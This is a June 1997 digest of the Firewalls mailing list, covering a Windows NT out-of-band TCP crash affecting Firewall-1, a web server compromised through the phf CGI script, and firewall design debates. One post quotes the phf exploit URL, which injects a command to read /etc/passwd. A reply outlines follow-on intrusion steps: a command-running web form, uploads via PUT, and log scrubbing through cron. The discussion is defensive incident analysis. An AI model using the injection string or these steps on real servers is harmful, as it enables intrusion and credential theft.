[FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 18:04:45 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i was under the impression that since FW-1 only supported serveral net = i/f cards that they rewrote the drivers for these, and thus managing to = get between the OS and the card h/w. [pls correct me if i'm wrong, this was only an assumption !] Pete ---------- From: Bryan D. Boyle Sent: 05 June 1997 13:46 To: Jyri Kaljundi Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts At 03:08 PM 6/5/97 +0300, you wrote: >You mean you can crash and NT FW-1 by sending OOB data to it?! >That's scary if it is true and should be addressed by Check Point ASAP! > It is a bogosity with NT and not with FW1. Can't be addressed by = Checkpoint,=20 since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS. >What I have always thought of FW-1 is that it operates at quite low = level >inside the OS kernel, that as long as you filter everything the network >bugs in the OS don't really matter, as the packets never reach FW-1.=20 Nothing except MS code operates in the NT kernel. This problem is with=20 what happens when you send oob data to a stack (MS) that is tightly = integrated with the OS (FW1 runs on top of this stuff, not in it...) and the = stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal = example of the difference between designing for peer review of your security = model and designing for what gets good trade publication reviews. =20 > >If sending some bytes of data to FW1 crashes it and the OS, this >combination (FW1+NT) should not be used as a firewall solution at all. = May >be someone from CP could explain, how much do the bugs in the OS matter >once FW1 is installed. If there is an overall architectural problem with NT as it is, then the = OS bugs matter A LOT. But, of course, those that say you can trust a black = box solution since the vendors are trustworthy are quite quiet on this = regard... I would agree that you should ignore NT as an OS platform in a=20 security solution right now. Just my opinion, $.02 US, etc. Flames to /dev/null. -- Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 #include | VIRTUAL: http://www.access.digex.net/~bdboyle AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ | HISTORICAL: HQ, 6th Battalion, Army of No. VA. "What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787 From owner-firewalls-outgoing Thu Jun 5 16:44:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09728 for firewalls-outgoing; Thu, 5 Jun 1997 09:39:56 -0700 (PDT) Received: from gateway-out.corp.usweb.com (gateway-out.usweb.com [205.180.171.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09707 for ; Thu, 5 Jun 1997 09:39:40 -0700 (PDT) Received: by gateway-out.corp.usweb.com; id IAA13653; Thu, 5 Jun 1997 08:49:03 -0700 Received: from mailhub.corp.usweb.com(172.16.1.11) by gateway-out.corp.usweb.com via smap (V3.1.1) id xma013578; Thu, 5 Jun 97 08:48:39 -0700 Received: by mailhub.corp.usweb.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC7195.093A9030@mailhub.corp.usweb.com>; Thu, 5 Jun 1997 09:44:17 -0700 Message-ID: From: Eric Tebelak To: "'Daniel Strawson'" , "'Jyri Kaljundi'" Cc: "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 09:44:16 -0700 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's an excerpt from the readme file for the OOB data attack on NT: "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow." Microsoft Tech Support Installing the post SP3 OOB hotfix should correct this problem. Eric L. Tebelak NT Systems Engineer USWeb Corporation E-Mail: elt@usweb.com Web: http://www.usweb.com >-----Original Message----- >From: Daniel Strawson [SMTP:daniel@elmail.co.uk] >Sent: Thursday, June 05, 1997 6:25 AM >To: Jyri Kaljundi >Cc: Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing = list >Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > > >Hang on a moment. > >Let me put this in perspective. > >As I understand it, this problem results from sending packets with a >particular IP option set in the header. (Please confirm I'm right here >someone). > >Firewall _SHOULD_ drop all packets with IP options set. This would = mean >that all Firewall-1 systems and systems behind Firewall-1 are = impervious >to this attack. (something for Checkpoint to be proud of). > >Unfortunately this is not the case - as I say I've managed to get NT to >crash with FW-1 installed. > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to >crash, you get the NT system that it is running on to crash, so it is = not >an insecurity, but a claimed feature that doesn't work. > >So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. > >Cheers, > >Daniel > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: >>=20 >> > We tried it and, yes we managed to crash an NT based Firewall-1 = system. >> > This is odd since (if memory serves) the packets should be dropped = on the >> > floor by the stateful inspection module. >>=20 >> You mean you can crash and NT FW-1 by sending OOB data to it?! >> That's scary if it is true and should be addressed by Check Point = ASAP! >>=20 >> What I have always thought of FW-1 is that it operates at quite low = level >> inside the OS kernel, that as long as you filter everything the = network >> bugs in the OS don't really matter, as the packets never reach FW-1.=20 >>=20 >> If sending some bytes of data to FW1 crashes it and the OS, this >> combination (FW1+NT) should not be used as a firewall solution at = all. May >> be someone from CP could explain, how much do the bugs in the OS = matter >> once FW1 is installed. >>=20 >> J=FCri >>=20 >>=20 From owner-firewalls-outgoing Thu Jun 5 16:53:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA01850 for firewalls-outgoing; Thu, 5 Jun 1997 14:27:59 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id OAA27801 for firewalls@greatcircle.com; Thu, 5 Jun 1997 14:06:20 -0700 (PDT) Received: from newton.ispgaya.pt (newton.ispgaya.pt [194.79.91.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA14205 for ; Thu, 5 Jun 1997 04:57:59 -0700 (PDT) Received: from localhost (pbrandao@localhost) by newton.ispgaya.pt (8.8.4/8.8.4) with SMTP id NAA01998 for ; Thu, 5 Jun 1997 13:04:13 +0100 Date: Thu, 5 Jun 1997 13:04:13 +0100 (WET DST) From: Paulo Brandao To: firewalls@GreatCircle.Com Subject: Help Linux Versus WindowsNT passwords Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, My name is Paulo Brandao, and i study in ISPGaya, here i am a system administrator of a Linux Machine. Well, i have a big problem, i have a windowsNT4 server and a Linux server, i have about 50 computers with windows95,and i use samba to give access to the homes in Linux, and this is working just fine, my problem is that i have hundreds of accounts and i must creat for each student an account in Linux and another in windowsNT, so each student as 2 password's. So i lost hours to creat and administrate these accounts. What i want to do is by someway to validate a login in the WindowsNT, or buy another server that uses the SMB protocol. I don't no if it is possibel because i have to change the login and passwd source code, but someone told me that that is possible to do using PAM. If someone now how or another way, i will apreciate. Sorry my english, and thank you for your help. Paulo Brandao *----------------------------------------------* | Paulo Brandao | | | | email : pbrandao@ispgaya.pt | | URL : www.ISPGaya.pt | | Home Page : www.ISPGaya.pt/users/pbrandao | | Profissao : Administrador | | Tecnico de Informatica | | Estudante de Eng. Informatica | *----------------------------------------------* From owner-firewalls-outgoing Thu Jun 5 16:54:04 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14348 for firewalls-outgoing; Thu, 5 Jun 1997 10:07:44 -0700 (PDT) Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA14274 for ; Thu, 5 Jun 1997 10:07:03 -0700 (PDT) Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13799 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:14:29 +0100 (BST) Date: Thu, 5 Jun 1997 18:05:54 +0100 (BST) From: Daniel Strawson To: Eric Tebelak cc: "'Jyri Kaljundi'" , "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, I've just read the RFCs. I hadn't read this document, I had read other documents and had been given the impression that it was a IP option. I'll be more careful next time I read about these sorts of attack. Cheers, Daniel On Thu, 5 Jun 1997, Eric Tebelak wrote: > Here's an excerpt from the readme file for the OOB data attack on NT: >=20 > "A sender specifies "Out of Band" data by setting the URGENT bit flag in > the > TCP header. The receiver uses the URGENT POINTER to determine where in > the > segment the urgent data ends. Windows NT bugchecks when the URGENT > POINTER > points to the end of the frame and no normal data follows. Windows NT > expects normal data to follow." Microsoft Tech Support >=20 > Installing the post SP3 OOB hotfix should correct this problem. >=20 > Eric L. Tebelak > NT Systems Engineer > USWeb Corporation > E-Mail: elt@usweb.com > Web: http://www.usweb.com >=20 > >-----Original Message----- > >From:=09Daniel Strawson [SMTP:daniel@elmail.co.uk] > >Sent:=09Thursday, June 05, 1997 6:25 AM > >To:=09Jyri Kaljundi > >Cc:=09Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing= list > >Subject:=09RE: [FW1] Out of Band Data Attack against NT-Hosts > > > > > >Hang on a moment. > > > >Let me put this in perspective. > > > >As I understand it, this problem results from sending packets with a > >particular IP option set in the header. (Please confirm I'm right here > >someone). > > > >Firewall _SHOULD_ drop all packets with IP options set. This would mean > >that all Firewall-1 systems and systems behind Firewall-1 are impervious > >to this attack. (something for Checkpoint to be proud of). > > > >Unfortunately this is not the case - as I say I've managed to get NT to > >crash with FW-1 installed. > > > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > >crash, you get the NT system that it is running on to crash, so it is no= t > >an insecurity, but a claimed feature that doesn't work. > > > >So, either - > > > > - The IP Options drop code in FW-1 doesn't work. > > > > or > > > > - I do not properly understand this attack and it does not work as I > > imagine - in this case, please correct me. > > > >Cheers, > > > >Daniel > > > > > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > > > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: > >>=20 > >> > We tried it and, yes we managed to crash an NT based Firewall-1 syst= em. > >> > This is odd since (if memory serves) the packets should be dropped o= n the > >> > floor by the stateful inspection module. > >>=20 > >> You mean you can crash and NT FW-1 by sending OOB data to it?! > >> That's scary if it is true and should be addressed by Check Point ASAP= ! > >>=20 > >> What I have always thought of FW-1 is that it operates at quite low le= vel > >> inside the OS kernel, that as long as you filter everything the networ= k > >> bugs in the OS don't really matter, as the packets never reach FW-1.= =20 > >>=20 > >> If sending some bytes of data to FW1 crashes it and the OS, this > >> combination (FW1+NT) should not be used as a firewall solution at all.= May > >> be someone from CP could explain, how much do the bugs in the OS matte= r > >> once FW1 is installed. > >>=20 > >> J=FCri > >>=20 > >>=20 >=20 From owner-firewalls-outgoing Thu Jun 5 16:56:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA17405 for firewalls-outgoing; Thu, 5 Jun 1997 13:10:23 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA17304 for ; Thu, 5 Jun 1997 13:10:04 -0700 (PDT) Message-Id: <199706052010.NAA17304@honor.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA140251180; Fri, 6 Jun 1997 06:06:21 +1000 From: Darren Reed Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts To: adam@homeport.org (Adam Shostack) Date: Fri, 6 Jun 1997 06:06:20 +1000 (EST) Cc: bdboyle@att.com, jk@stallion.ee, firewalls@GreatCircle.COM In-Reply-To: <199706051640.MAA06916@homeport.org> from "Adam Shostack" at Jun 5, 97 12:40:33 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Adam Shostack, sie said: > > A friend suggests that the problem may be that the FW1 is > passing code upwards to the NT stack. FW1 sits beneath the stack, and > intercepts packets before they can do damage. However, if you > configure the firewall to allow packets to the NT stack, then NT will > crash. Or any NT stack that it lets packets through to... (I'm not sure if you mean packets targetted for the NT FW itself or hosts behind...) > I'll point out that if this is so, then an Application Proxy* > probably would not exhibit the same behavior, since it would rebuild > the IP packet, instead of sending the OOB packet on to its > destination when it hits an "OK" rule. Ummm, the application proxy can not protect itself, but if the FW is patched, then it does (should) protect all services behind it. Darren From owner-firewalls-outgoing Thu Jun 5 17:01:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA18852 for firewalls-outgoing; Thu, 5 Jun 1997 13:19:26 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18586 for ; Thu, 5 Jun 1997 13:18:21 -0700 (PDT) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id NAA16445 for ; Thu, 5 Jun 1997 13:07:17 -0700 (PDT) Received: from scribe.cc.purdue.edu by mycroft.GreatCircle.COM (8.8.5/SMI-4.1/Brent-970426) id NAA18001; Thu, 5 Jun 1997 13:01:30 -0700 (PDT) Received: from ia01.freh.purdue.edu by scribe.cc.purdue.edu; Thu, 5 Jun 97 15:04:09 -0500 Comments: Authenticated sender is From: "Michael S Hines" Organization: Purdue University To: "Sameer R. Manek" Date: Thu, 5 Jun 1997 15:06:10 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: psswd HACK Reply-to: mshines@purdue.edu CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.42) Message-Id: <33971bb92e3f002@scribe.cc.purdue.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This is how the exploit is done > http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd > But that's not really important. Lets assume they got your passwd file. > That means they have the option to crack on that passwd file, lets assume > they did that too. > > They know in theory know the login and password of every one on that > machine. I'll bet the login names and password of people on your webserver > are the same as their login/password as other machines on your network. > Does this cause concern? it should. Given the fact that they ran the phf > script in april, they've had atleast a month to run crack. > > Assume that your webserver has been compromised and they have had a > sniffer running on that box for a month, what would you do? You need to > think about the worstcase senerio and work backwards instead of thinking > 'oh all they got was my password file' And your web pages are only protected using the UNIX system security - correct? Have you noticed any new web pages yet? Knowing the ID/PW will get them in wiht FTP to upload new web pages...I'd be worried about a web attack. ----------------------------------------------------------------- Internet: mshines@purdue.edu * Michael S. Hines, CDP, CFE Voice: (765) 494-5845 * Sr. Information Systems Auditor FAX: (765) 496-1814 * Purdue University if AC 765 doesn't work, try 317 * 1065 Freehafer Hall * West Lafayette, IN 47907-1065 All views are my own and do not reflect Purdue University policy. From owner-firewalls-outgoing Thu Jun 5 17:07:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA26457 for firewalls-outgoing; Thu, 5 Jun 1997 14:00:59 -0700 (PDT) Received: from compute.com (compute.compute.com [192.215.246.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA26420 for ; Thu, 5 Jun 1997 14:00:41 -0700 (PDT) Received: by compute.com (4.1/SMI-4.1) id AA05091; Thu, 5 Jun 97 14:04:41 PDT Message-Id: <9706052104.AA05091@compute.com> From: rob@compute.com (Robert Roell -Network Intensive) Date: Thu, 5 Jun 1997 14:04:41 -0700 X-Mailer: Mail User's Shell (7.2.3 5/22/91) To: syscrash@milehigh.net, firewalls@greatcircle.com Subject: Re: Raptor firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brien, First lets explain that you need to split your DNS entities into two parts, public and private. Once you have done this, then you need to construct a DNS architecture that will provide all DNS queries(Internet and your pub. and private) to your internal systems, while only providing DNS queries for the public information to the 'Net. Classically, this is done through a "dual-level" DNS, where you have an internal DNS server providing only answers to private queries, and an external DNS server providing only answers public queries for your domain. To accomplish this, one sets up the external DNS on the Raptor system, and then the internal DNS server should have a "forwarders" directive of your named.boot file pointing to the Raptor system for anything it does not know about. This is sometimes accomplished through using a "caching-only" DNS server on the Raptor system when you have your ISP providing your public DNS services for you domain. With EagleNT4.0, Raptor provices a "dnsd" that can accomplish all of this on the Raptor system(i.e. public and private info from one server), while knowing when to allow access queries for private DNS information. In this scenario, I would recommend integrating this with your current DNS through the use of the "forwarders" directive in your named.boot file on your internal server. Then either use the dnsd for your public DNS, or just setup the forwarders to point to your ISP if they are providing your DNS primary for you. If you look in the EagleNT4.0 docs, there should be a full explaination(with pictures) of the "dual-level" DNS. HTH, rob ] [On Jun 5, Brian Delgado wrote:] ] Subject: Raptor firewall ] I am kind of a beginner at this so I apologize if this question is ] basic, but I figured this would be the best forum to get a valid answer. ] Here is my question: I am setting up Raptor on a Windows NT 4.0 server. ] I am currently running DNS on a SUN platform for internal name ] resolution. I realize that Raptor is an application gateway. Does this ] mean I have to run my name server on the Bastion host or can I continue ] to run it where I am currently? ] Any help would be appreciated. ] ] Brien Delgado ]-- End of excerpt from -- ------------------------------------------------------------- N E T W O R K I N T E N S I V E A Member of the Verio Group www.ni.net Robert Roell Senior Internet Systems Engineer rob@compute.com Phone 714-450-8400 ------------------------------------------------------------- From owner-firewalls-outgoing Thu Jun 5 18:31:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA05653 for firewalls-outgoing; Thu, 5 Jun 1997 09:16:07 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA05464 for ; Thu, 5 Jun 1997 09:15:23 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA27158; Thu, 5 Jun 1997 19:19:38 +0400 Received: from GarantiUser by GarantiMailServer id AA10886; Thu, 5 Jun 1997 19:18:53 +0400 Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA34532; Thu, 5 Jun 1997 19:16:41 +0400 Message-Id: <339773DE.3884@garanti.com.tr> Date: Thu, 05 Jun 1997 19:20:14 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: Limiting Mail size.. Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It is out of topic but how can I limit inbound and outbound email size... Thanks, -- *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 *************************************************************** From owner-firewalls-outgoing Thu Jun 5 18:37:47 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA14442 for firewalls-outgoing; Thu, 5 Jun 1997 12:50:27 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA14430 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:50:23 -0700 (PDT) Received: from hdshq.com (wwtk.hdshq.com [206.215.16.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA03872 for ; Mon, 2 Jun 1997 12:13:19 -0700 (PDT) Received: from w95dev.hdshq.com ([199.228.179.37]) by hdshq.com (1/HDS MAIL SYSTEM) with SMTP id MAA30853; Mon, 2 Jun 1997 12:16:45 -0700 Message-Id: <1.5.4.32.19970602191559.0067f420@popper.hdshq.com> X-Sender: carl@popper.hdshq.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 02 Jun 1997 12:15:59 -0700 To: fwtk , firewalls From: "Carl V. Claunch" Subject: Re: Plug-gw- One to many relationship Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:31 AM 6/2/97 -0400, Ken Kempster wrote: >[To be removed from this list send the message "unsubscribe fwtk-users" in the >BODY of a mail message to majordomo@ex.tis.com.] > >Hi all, > > Has anyone gotten a one to many relationship to work >with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > > >thanx for any help. > What semantics are you expecting with this? We have a patch to plug-gw that will try alternate addresses in sequence until a successful connection occurs. It is used mainly for automating access through backup paths. If this is what you want, I could be persuaded to have someone here make this publicly available as a contribution. From owner-firewalls-outgoing Thu Jun 5 18:44:05 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA26289 for firewalls-outgoing; Thu, 5 Jun 1997 11:07:33 -0700 (PDT) Received: from live-oak.cycon.com (live-oak.CYCON.COM [198.202.237.69]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA26223 for ; Thu, 5 Jun 1997 11:07:15 -0700 (PDT) Received: from localhost (ardoin@localhost) by live-oak.cycon.com (8.8.5/8.7.3) with SMTP id OAA13649; Thu, 5 Jun 1997 14:11:33 -0400 (EDT) X-Authentication-Warning: live-oak.cycon.com: ardoin owned process doing -bs Date: Thu, 5 Jun 1997 14:11:33 -0400 (EDT) From: Cy Ardoin To: "Jonathan M. Bresler" cc: Firewalls@GreatCircle.COM Subject: Re: PIX and FW-1 (packet filter Question) In-Reply-To: <199706051718.NAA08468@kryten.frb.gov> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: > > >I don't think there is anything an application firewall can > >do that can't also be done by a "packet filter" firewall. The > > trivial example: > a smtp application level proxy can disable the "debug" command > for every sendmail behind that firewall. Finding and removing the "debug" command from smtp connections at the packet layer isn't much different than finding and altering the PORT and PASV part of the FTP command and all the NAT style packet filters modify the FTP commands. It's not something packet filters do, but it is no more difficult than many of the things they already do. Thanks -- Cy Ardoin ardoin@cycon.com -------------------------------------------------------------------- -- Cypress Consulting, Inc. | Voice: 703/383-0247 --- -- 4101 Olympic Way, Alexandria VA | Fax: 703/383-0320 ---- -- and | ---- -- 11240 Waples Mill Road, Suite 403, | http://www.cycon.com/ --- -- Fairfax, VA 22030 | -- -------------------------------------------------------------------- From owner-firewalls-outgoing Thu Jun 5 19:06:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA00108 for firewalls-outgoing; Thu, 5 Jun 1997 08:43:31 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA29980 for ; Thu, 5 Jun 1997 08:43:21 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id KAA01085; Thu, 5 Jun 1997 10:47:25 -0500 Date: Thu, 5 Jun 1997 10:47:25 -0500 From: Craig Brozefsky Subject: RE: PIX and Firewall-1 To: Bill Stout cc: firewalls@GreatCircle.COM In-Reply-To: <2.2.32.19970604211523.0070ff68@vaxf.pios.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Bill Stout wrote: > Peter Carlson writes.... > >in whatway are application level gateways more secure than, say, FW-1 or PIX? > >There are certainly capabilities that can be provided via application > >proxies that can't be provided by any filter-based technologies, but what > >types of attacks are a FW-1 or a PIX vulnerable to that application > >proxies aren't? You should check should out comp.security.firewalls for a good discussion of these issues. PIX is a NAT capable router with a few filtering rules thrown in, such things are hardly safe, architecturally, and implementation wise. NAT is NOT, I repeat NOT! a security tool, and should not be treated as a part of your security infrastructure. Nearly all NAT tools are not designed with security in mind. > Application proxies monitor commands sent at the application layer, and > reconstruct packets so that IP attacks can't be sent beyond the firewall. > (From what I understand), State-based (a.k.a. enhanced extended packet > filter) security devices inspect the first packet that comes across with > enhanced extended filtering rules and can include additional authentication. > If that packet passes all filtering rules, remaining packets of that session > are passed through without inspection. I am not sure that all SMLI firewall use that method for determine a packets validity. > Good applications for packet filter/State-based firewalls are low-security > internet feeds and fast low-latency intranet (10/100/155MB/...) security > filtering. Not everyone needs a full application proxy firewall, a subject > that comes up when I visit Mom-and-Pop small businesses that want a single > feed for their 10 PCs. I agree, we actually use Linux boxen in such situations. Our company has a support infrastructure in place to keep those machines in good shape, they are cheap for the client, and we have very intimate knowledge of their workings(most of us in the company are Linux fans). We've been doing this for a few years now I believe. It does routing, email, and NAT for their PC/MAC network and often handles dial-in and printing services as well. All parties involved know that this is not 'the most secure' solution, but it's the most cost effective and flexible. > IMHO - State-based firewalls are 'only' packet filters, and for the > corporate environment should not replace the traditional proxy server, but > work in conjunction with one. I agree. It would rock is TIS got their IP packet filters really wacked out, with all kinds of filtering options on packet headers. It works well now, but I would like to really have the ability to write up some insane rulesets. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Thu Jun 5 19:14:55 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA04343 for firewalls-outgoing; Thu, 5 Jun 1997 09:07:53 -0700 (PDT) Received: from gargoyle.clark.net (pm2-112.dcwt.infi.net [208.136.65.112]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA04259 for ; Thu, 5 Jun 1997 09:07:36 -0700 (PDT) Received: (qmail 6383 invoked by uid 500); 5 Jun 1997 16:14:44 -0000 Date: Thu, 5 Jun 1997 12:14:44 -0400 (EDT) From: "Paul D. Robertson" X-Sender: proberts@gargoyle To: Stan Wnuck cc: firewalls@GreatCircle.COM Subject: Re: psswd HACK In-Reply-To: <199706051407.HAA20909@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Stan Wnuck wrote: > OK! Let's say that they did get my passwd file..... > How much damage can they do if I have a firewall in place that my web server > sits behind? The only services available from this host to the Internet is Well, given the fact that they can execute any command on the web server, how much damage can someone with an account on the web server do? Can that machine initiate connections to other hosts other than to SMTP ports or for DNS resolution? If so, makes a great place to launch attacks from. Are there other machines behind that firewall? Suddenly there is a way to attack those machines..... > http, dns, and smtp. So services like ftp and telnet would be denied if they > tried. Is there something I am missing? Don't need telnet, just install a web form that takes commands in, and echos the output. Use PUT to upload files, and bingo, you don't need telnet, FTP, or anything else. Or keep using the current CGI hole to execute commands. The only thing missing is adding a crontab entry to scrub the log files, and that's fairly trivial. Are all the id/passwords on that machine unique to that machine? Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From owner-firewalls-outgoing Thu Jun 5 19:38:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA29533 for firewalls-outgoing; Thu, 5 Jun 1997 11:25:13 -0700 (PDT) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA29487 for ; Thu, 5 Jun 1997 11:25:02 -0700 (PDT) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id UAA03300; Thu, 5 Jun 1997 20:00:43 +0200 (MET DST) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id RAA01169; Tue, 3 Jun 1997 17:54:08 +0200 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id SAA00691; Tue, 3 Jun 1997 18:09:37 +0200 To: girsch@marben.com (Arnaud Girsch) Cc: pnash@hanshan.bbnplanet.com, don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@GreatCircle.COM, ylo@cs.hut.fi Subject: Re: ssh proxy for fwtk References: <199706030143.SAA22532@mail.marben.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 03 Jun 1997 18:09:35 +0200 In-Reply-To: girsch@marben.com's message of Mon, 2 Jun 1997 18:43:28 -0700 (PDT) Message-ID: <87k9kbfz28.fsf@devnull.ruhr.de> Lines: 23 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 